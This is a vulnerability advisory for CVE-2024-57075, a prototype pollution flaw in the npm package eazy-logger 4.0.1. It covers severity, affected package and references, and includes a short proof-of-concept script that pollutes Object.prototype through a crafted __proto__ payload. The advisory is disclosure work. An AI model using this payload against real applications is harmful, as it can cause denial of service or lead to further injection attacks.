GHSA-r7jx-5m6m-cpg9
Suggest an improvement- Source
- https://github.com/advisories/GHSA-r7jx-5m6m-cpg9
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-r7jx-5m6m-cpg9/GHSA-r7jx-5m6m-cpg9.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-r7jx-5m6m-cpg9
- Aliases
-
- CVE-2024-57075
- Published
- 2025-02-06T06:31:26Z
- Modified
- 2025-04-07T12:34:01Z
- Severity
-
- 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
- Summary
- eazy-logger prototype pollution
- Details
-
A prototype pollution in the lib.Logger function of eazy-logger v4.0.1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.
An attacker can supply a payload with
Object.prototypesetter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g.,
child_process.exec,eval), it could enable an attacker to execute arbitrary commands within the application's context.Proof of Concept
(async () => { const lib = await import('eazy-logger'); var someObj = {} console.log("Before Attack: ", JSON.stringify({}.__proto__)); try { // for multiple functions, uncomment only one for each execution. lib.Logger (JSON.parse('{"__proto__":{"pollutedKey":123}}')) } catch (e) { } console.log("After Attack: ", JSON.stringify({}.__proto__)); delete Object.prototype.pollutedKey; })(); - Database specific
{ "nvd_published_at": "2025-02-05T22:15:31Z", "cwe_ids": [ "CWE-1321", "CWE-400" ], "github_reviewed_at": "2025-02-06T23:31:34Z", "github_reviewed": true, "severity": "HIGH" }- References
Affected packages
npm / eazy-logger
Package
- Name
- eazy-logger
- View open source insights on deps.dev
- Purl
- pkg:npm/eazy-logger